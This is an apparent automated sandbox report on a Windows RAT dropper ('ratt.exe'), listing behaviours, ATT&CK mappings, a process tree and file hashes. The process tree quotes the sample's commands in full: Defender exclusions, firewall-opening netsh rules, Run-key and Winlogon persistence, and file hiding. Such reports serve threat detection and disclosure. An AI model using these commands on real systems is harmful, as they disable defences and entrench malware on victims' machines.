7757e6ea23c6561e1a03ee88cb8dbfd3445223da72f99fe5b5a980ea150a0996

Analysis

max time kernel
67s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20230824-en
resource tags

arch:x64arch:x86image:win10v2004-20230824-enlocale:en-usos:windows10-2004-x64system
submitted
31/08/2023, 11:20

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

7757e6ea23c6561e1a03ee88cb8dbfd3445223da72f99fe5b5a980ea150a0996.exe
Size

1.4MB
MD5

ece0793dc6eaf38591c987be7b5f94bd
SHA1

32ff903b7cafd3a9b7150655934523860a5afc0b
SHA256

7757e6ea23c6561e1a03ee88cb8dbfd3445223da72f99fe5b5a980ea150a0996
SHA512

fc6681c8829646ef53322b6d8a744e2c376986f256564a0a402348acbf87b0a704beceafc799f26090163386801ea86285a96cb0e29677a2e0e4c31991092f30
SSDEEP

24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk

Score

8^/10

evasion persistence upx

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
2748	netsh.exe
3356	netsh.exe

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x0007000000022fe3-100.dat	acprotect
behavioral1/files/0x0007000000022fe3-99.dat	acprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-642304425-1816607141-2958861556-1000\Control Panel\International\Geo\Nation	7757e6ea23c6561e1a03ee88cb8dbfd3445223da72f99fe5b5a980ea150a0996.exe

Executes dropped EXE 3 IoCs

pid	Process
2384	7z.exe
4748	ratt.exe
3236	ratt.exe

Loads dropped DLL 1 IoCs

pid	Process
2384	7z.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000022fe4-96.dat	upx
behavioral1/memory/2384-97-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/files/0x0006000000022fe4-98.dat	upx
behavioral1/files/0x0007000000022fe3-100.dat	upx
behavioral1/files/0x0007000000022fe3-99.dat	upx
behavioral1/memory/2384-101-0x0000000010000000-0x00000000100E2000-memory.dmp	upx
behavioral1/memory/2384-105-0x0000000000400000-0x0000000000432000-memory.dmp	upx

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ratt = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ratt.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
3480	PING.EXE
2272	PING.EXE
1416	PING.EXE
3916	PING.EXE

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
1832	powershell.exe
1832	powershell.exe
4720	powershell.exe
4720	powershell.exe
4776	powershell.exe
4776	powershell.exe
1352	powershell.exe
1352	powershell.exe
4768	powershell.exe
4768	powershell.exe
4488	powershell.exe
4488	powershell.exe
4748	ratt.exe
4748	ratt.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4792	WMIC.exe
Token: SeSecurityPrivilege	4792	WMIC.exe
Token: SeTakeOwnershipPrivilege	4792	WMIC.exe
Token: SeLoadDriverPrivilege	4792	WMIC.exe
Token: SeSystemProfilePrivilege	4792	WMIC.exe
Token: SeSystemtimePrivilege	4792	WMIC.exe
Token: SeProfSingleProcessPrivilege	4792	WMIC.exe
Token: SeIncBasePriorityPrivilege	4792	WMIC.exe
Token: SeCreatePagefilePrivilege	4792	WMIC.exe
Token: SeBackupPrivilege	4792	WMIC.exe
Token: SeRestorePrivilege	4792	WMIC.exe
Token: SeShutdownPrivilege	4792	WMIC.exe
Token: SeDebugPrivilege	4792	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4792	WMIC.exe
Token: SeRemoteShutdownPrivilege	4792	WMIC.exe
Token: SeUndockPrivilege	4792	WMIC.exe
Token: SeManageVolumePrivilege	4792	WMIC.exe
Token: 33	4792	WMIC.exe
Token: 34	4792	WMIC.exe
Token: 35	4792	WMIC.exe
Token: 36	4792	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4792	WMIC.exe
Token: SeSecurityPrivilege	4792	WMIC.exe
Token: SeTakeOwnershipPrivilege	4792	WMIC.exe
Token: SeLoadDriverPrivilege	4792	WMIC.exe
Token: SeSystemProfilePrivilege	4792	WMIC.exe
Token: SeSystemtimePrivilege	4792	WMIC.exe
Token: SeProfSingleProcessPrivilege	4792	WMIC.exe
Token: SeIncBasePriorityPrivilege	4792	WMIC.exe
Token: SeCreatePagefilePrivilege	4792	WMIC.exe
Token: SeBackupPrivilege	4792	WMIC.exe
Token: SeRestorePrivilege	4792	WMIC.exe
Token: SeShutdownPrivilege	4792	WMIC.exe
Token: SeDebugPrivilege	4792	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4792	WMIC.exe
Token: SeRemoteShutdownPrivilege	4792	WMIC.exe
Token: SeUndockPrivilege	4792	WMIC.exe
Token: SeManageVolumePrivilege	4792	WMIC.exe
Token: 33	4792	WMIC.exe
Token: 34	4792	WMIC.exe
Token: 35	4792	WMIC.exe
Token: 36	4792	WMIC.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeDebugPrivilege	4776	powershell.exe
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe
Token: SeDebugPrivilege	4488	powershell.exe
Token: SeIncreaseQuotaPrivilege	3912	WMIC.exe
Token: SeSecurityPrivilege	3912	WMIC.exe
Token: SeTakeOwnershipPrivilege	3912	WMIC.exe
Token: SeLoadDriverPrivilege	3912	WMIC.exe
Token: SeSystemProfilePrivilege	3912	WMIC.exe
Token: SeSystemtimePrivilege	3912	WMIC.exe
Token: SeProfSingleProcessPrivilege	3912	WMIC.exe
Token: SeIncBasePriorityPrivilege	3912	WMIC.exe
Token: SeCreatePagefilePrivilege	3912	WMIC.exe
Token: SeBackupPrivilege	3912	WMIC.exe
Token: SeRestorePrivilege	3912	WMIC.exe
Token: SeShutdownPrivilege	3912	WMIC.exe
Token: SeDebugPrivilege	3912	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3912	WMIC.exe
Token: SeRemoteShutdownPrivilege	3912	WMIC.exe
Token: SeUndockPrivilege	3912	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2112 wrote to memory of 2328	2112	7757e6ea23c6561e1a03ee88cb8dbfd3445223da72f99fe5b5a980ea150a0996.exe	88
PID 2112 wrote to memory of 2328	2112	7757e6ea23c6561e1a03ee88cb8dbfd3445223da72f99fe5b5a980ea150a0996.exe	88
PID 2112 wrote to memory of 2328	2112	7757e6ea23c6561e1a03ee88cb8dbfd3445223da72f99fe5b5a980ea150a0996.exe	88
PID 2328 wrote to memory of 264	2328	cmd.exe	91
PID 2328 wrote to memory of 264	2328	cmd.exe	91
PID 2328 wrote to memory of 264	2328	cmd.exe	91
PID 264 wrote to memory of 4748	264	cmd.exe	92
PID 264 wrote to memory of 4748	264	cmd.exe	92
PID 264 wrote to memory of 4748	264	cmd.exe	92
PID 2328 wrote to memory of 2268	2328	cmd.exe	93
PID 2328 wrote to memory of 2268	2328	cmd.exe	93
PID 2328 wrote to memory of 2268	2328	cmd.exe	93
PID 2268 wrote to memory of 4792	2268	cmd.exe	94
PID 2268 wrote to memory of 4792	2268	cmd.exe	94
PID 2268 wrote to memory of 4792	2268	cmd.exe	94
PID 2328 wrote to memory of 1832	2328	cmd.exe	96
PID 2328 wrote to memory of 1832	2328	cmd.exe	96
PID 2328 wrote to memory of 1832	2328	cmd.exe	96
PID 2328 wrote to memory of 4720	2328	cmd.exe	97
PID 2328 wrote to memory of 4720	2328	cmd.exe	97
PID 2328 wrote to memory of 4720	2328	cmd.exe	97
PID 2328 wrote to memory of 4776	2328	cmd.exe	98
PID 2328 wrote to memory of 4776	2328	cmd.exe	98
PID 2328 wrote to memory of 4776	2328	cmd.exe	98
PID 2328 wrote to memory of 1352	2328	cmd.exe	99
PID 2328 wrote to memory of 1352	2328	cmd.exe	99
PID 2328 wrote to memory of 1352	2328	cmd.exe	99
PID 2328 wrote to memory of 4768	2328	cmd.exe	100
PID 2328 wrote to memory of 4768	2328	cmd.exe	100
PID 2328 wrote to memory of 4768	2328	cmd.exe	100
PID 2328 wrote to memory of 2384	2328	cmd.exe	101
PID 2328 wrote to memory of 2384	2328	cmd.exe	101
PID 2328 wrote to memory of 2384	2328	cmd.exe	101
PID 2328 wrote to memory of 4488	2328	cmd.exe	104
PID 2328 wrote to memory of 4488	2328	cmd.exe	104
PID 2328 wrote to memory of 4488	2328	cmd.exe	104
PID 4488 wrote to memory of 2748	4488	powershell.exe	105
PID 4488 wrote to memory of 2748	4488	powershell.exe	105
PID 4488 wrote to memory of 2748	4488	powershell.exe	105
PID 4488 wrote to memory of 3356	4488	powershell.exe	106
PID 4488 wrote to memory of 3356	4488	powershell.exe	106
PID 4488 wrote to memory of 3356	4488	powershell.exe	106
PID 4488 wrote to memory of 1092	4488	powershell.exe	107
PID 4488 wrote to memory of 1092	4488	powershell.exe	107
PID 4488 wrote to memory of 1092	4488	powershell.exe	107
PID 1092 wrote to memory of 3912	1092	cmd.exe	108
PID 1092 wrote to memory of 3912	1092	cmd.exe	108
PID 1092 wrote to memory of 3912	1092	cmd.exe	108
PID 4488 wrote to memory of 1116	4488	powershell.exe	109
PID 4488 wrote to memory of 1116	4488	powershell.exe	109
PID 4488 wrote to memory of 1116	4488	powershell.exe	109
PID 1116 wrote to memory of 4216	1116	cmd.exe	110
PID 1116 wrote to memory of 4216	1116	cmd.exe	110
PID 1116 wrote to memory of 4216	1116	cmd.exe	110
PID 4488 wrote to memory of 4748	4488	powershell.exe	111
PID 4488 wrote to memory of 4748	4488	powershell.exe	111
PID 4488 wrote to memory of 4748	4488	powershell.exe	111
PID 4488 wrote to memory of 1464	4488	powershell.exe	112
PID 4488 wrote to memory of 1464	4488	powershell.exe	112
PID 4488 wrote to memory of 1464	4488	powershell.exe	112
PID 2328 wrote to memory of 4792	2328	cmd.exe	113
PID 2328 wrote to memory of 4792	2328	cmd.exe	113
PID 2328 wrote to memory of 4792	2328	cmd.exe	113
PID 2328 wrote to memory of 3236	2328	cmd.exe	114

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1464	attrib.exe

C:\Users\Admin\AppData\Local\Temp\7757e6ea23c6561e1a03ee88cb8dbfd3445223da72f99fe5b5a980ea150a0996.exe
"C:\Users\Admin\AppData\Local\Temp\7757e6ea23c6561e1a03ee88cb8dbfd3445223da72f99fe5b5a980ea150a0996.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:264
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup myip.opendns.com. resolver1.opendns.com
      4⤵
      PID:4748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2268
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic ComputerSystem get Domain
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4792
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1832
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4720
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4776
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1352
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4768
- - C:\Users\Admin\AppData\Local\Temp\7z.exe
    7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2384
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4488
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:2748
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:3356
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1092
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic computersystem where name="MTMNHEOR" set AutomaticManagedPagefile=False
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3912
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1116
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
        5⤵
        
        PID:4216
  - - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
      "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:4748
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        5⤵
        
        PID:1620
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 9
        6⤵
        Runs ping.exe
        
        PID:3916
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        6⤵
        
        PID:3836
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 13 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 13 > nul && "C:\Users\Admin\Music\rot.exe"
        5⤵
        
        PID:3848
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 13
        6⤵
        Runs ping.exe
        
        PID:3480
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Views/modifies file attributes
      PID:1464
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
    3⤵
    - Adds Run key to start application
    PID:4792
- - C:\Users\Admin\AppData\Local\Temp\ratt.exe
    "ratt.exe"
    3⤵
    - Executes dropped EXE
    PID:3236
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c ping 127.0.0.1 -n 17 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 17 > nul && "C:\Users\Admin\Music\rot.exe"
      4⤵
      PID:4476
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 17
        5⤵
        Runs ping.exe
        
        PID:2272
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 17
        5⤵
        Runs ping.exe
        
        PID:1416
    - - C:\Users\Admin\Music\rot.exe
        
        "C:\Users\Admin\Music\rot.exe"
        5⤵
        
        PID:4652
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:2160

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
251.1MB

MD5
0abcd47be9b70a350e4b51a57f7e2c67

SHA1
4b5f7bb9e0c281a3f73ee6385e4d81f3b1425c3d

SHA256
4bfc32ae7ff17b37daa8eff3b5ce817ecb4368d9393cd97e7fb285cb972f54d8

SHA512
f99716c33ce189cd666352ff139211c365293cca5bd2e214c7f13d0e6289bcec0b956190d897fed7d0c65796f509d579b4686dd7f82424d0db2373de275abe17

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
208.7MB

MD5
a0c2eecb42e92195f9607fee0fe856cd

SHA1
ea0f73d33228ce7bedccf083f0dcd6104676f0b5

SHA256
f03beec1e3a18e3ca75992b4d114577d0e17a7ebb03d0c62ea6ceffa4f74c818

SHA512
8ac7dc81733cba81176cd2556d31b8bc1feec4c22376a7f3682e8b1817018cbb660696d45eb365b775040088adb5c72c94f4e394077b5d0c7ee859f6959e1842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
33b19d75aa77114216dbc23f43b195e3

SHA1
36a6c3975e619e0c5232aa4f5b7dc1fec9525535

SHA256
b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

SHA512
676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ratt.exe.log

Filesize
1KB

MD5
9a2d0ce437d2445330f2646472703087

SHA1
33c83e484a15f35c2caa3af62d5da6b7713a20ae

SHA256
30ea2f716e85f8d14a201e3fb0897d745a01b113342dfb7a9b7ac133c4ef150c

SHA512
a61d18d90bfad9ea8afdfa37537cfea3d5a3d0c161e323fa65840c283bdc87c3de85daaff5519beea2f2719eec1c68398eea8679b55ff733a61052f073162d5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
707e16bcf3056abae090b6aa40169ac5

SHA1
4b8a5f12e4392e8950c820cfd48402e41fb1882b

SHA256
1b40154675eead75d78c5c342055ea6b9fa59c3f4db9e6ada3a618e58096d841

SHA512
db456e99c2336fb1a62e7bdf7ed75109ac73f1dd94954733df8bc1dbee22cb2e812076968970f20cb37efcaced272a3206e68a6d435eb104a1f937c47327b6b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
a2eca9e3059247ee5a420ac231f5495d

SHA1
cde5326fa7a651a58c8fd1e5300f374118422589

SHA256
b7495f7239afc8a5c7a8ce982d40712ecffb7bcdec87ddc08bc625b1cf0478b6

SHA512
bc208ddc69cd4ee391d41dad1b82a412f1b4d2ad1a4b7e2b956df8fe89e23eebb2b672f1714c59c0d61229451f33427140e4f3407a52361b701c9c0f612ac157

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
0a9f3e98f0545e8fc96fb4a78faf3405

SHA1
fc02ca336e6a23b61ae00f6116dfe5a001820b52

SHA256
3967b66a84844c365d0ab8493900edca566b6ea066f4b761ef7301dcdabb245b

SHA512
93af4ddea1efc9ba59e159b49caf88f5c68c48143ccd816554cb6e35f1a3a6645a4932eef02525922ddd9e26490671bb5647d7a9edb938e868c2031d0b358ec7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
4b2e8a4507f55fa476e7ed78f42b7d6c

SHA1
952d2f68a4bd73f63e6a0d73403dde30fdee7854

SHA256
eabe4b222487a00cd39d661ff65d4574e70ccec8162c5e50db9e0c55e25267fa

SHA512
9c47c0b47981e0df0c33900fcd383f2bc9dcb93285d484d618c4f0fc9ad0dffb1e292f20bcce8418783f50b655d0625ded933bcaf433e3c293b6f37f1df2c971

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
cf32267d94d44967ecda4e107538c9da

SHA1
541083d073e4d5294c8447d887c2db3d9b00c005

SHA256
7cef0b11017d8fdf8dadc67d13dfea96bc684570054619d109dc3b38c3dbdd10

SHA512
47944c22a67b61a64b43fdddfaac913826c624a0499efd23115fb7f7ddea74ac97510308bd4074b9444bc73994533d915e6ecd6aa31ceade56868cf6c00069a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Add.ps1

Filesize
1KB

MD5
0df43097e0f0acd04d9e17fb43d618b9

SHA1
69b3ade12cb228393a93624e65f41604a17c83b6

SHA256
c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873

SHA512
01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0sqhnhcz.3pd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.7z

Filesize
693KB

MD5
7de6fdf3629c73bf0c29a96fa23ae055

SHA1
dcb37f6d43977601c6460b17387a89b9e4c0609a

SHA256
069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff

SHA512
d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.bat

Filesize
1KB

MD5
7ea1fec84d76294d9256ae3dca7676b2

SHA1
1e335451d1cbb6951bc77bf75430f4d983491342

SHA256
9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

SHA512
ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
376.5MB

MD5
e693d6c8b2eb99effb0b11c35f9c49dc

SHA1
6cbdcf9791dd6c52d6b66a3a8a17ccbf6179534e

SHA256
c7d45d253ccf5c01d8d8d2f15061ad0812b821495412cfb98d3d73fca1c7300c

SHA512
91e63c9ce1d7513f3b636da0bd343d2331650650776d6b3705bb729946e1356f5da4f2ba1cfab8b1165abac0e5d5a366467e9219d579c3a817f0a5c2babee30e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
192.5MB

MD5
0f7c3e5ff239a670d9b8e5a5381582b1

SHA1
c63a6d4ce78755aa309b96a81cb62e3237139700

SHA256
283196fba7f23b8754c1b7ab5def99c05e57ef7054f50515fb9bed34bab7fc98

SHA512
22b26682dbcaa4d801f53d3cc3021201785f76ec3c6917fcda7cd5eee8856ac7d5a14b07fde59ccff8d471d05da4ebed99ad840e4e71eda3892d3e3ba725c31f

Download Submit
C:\Users\Admin\Music\rot.exe

Filesize
94.1MB

MD5
c35465d887093e86b070f10b48456823

SHA1
c2d3c85f29af1138c11694572b1e447a4fafe7ed

SHA256
1afbf0fb687b336c67547c1849cf65b9764702611e721a2a63673f5c33731103

SHA512
1556b53f6401383eba9eb9895ca63cb8cd201fcb9f961feca5ece4a8a2e8db779f81759b7b06cbdb768787b5642c2f41251b9647d72c895f505141d1d06e3d35

Download Submit
C:\Users\Admin\Music\rot.exe

Filesize
24.9MB

MD5
0e1f9fdf9073fa7b4f7af5560441767f

SHA1
cda9d7eb08d2aa930097cc14b9daee3045b66476

SHA256
e5e34ed0c0a2cf575a986bd282de02f64126746348512e7083b07b1cbd4d32c4

SHA512
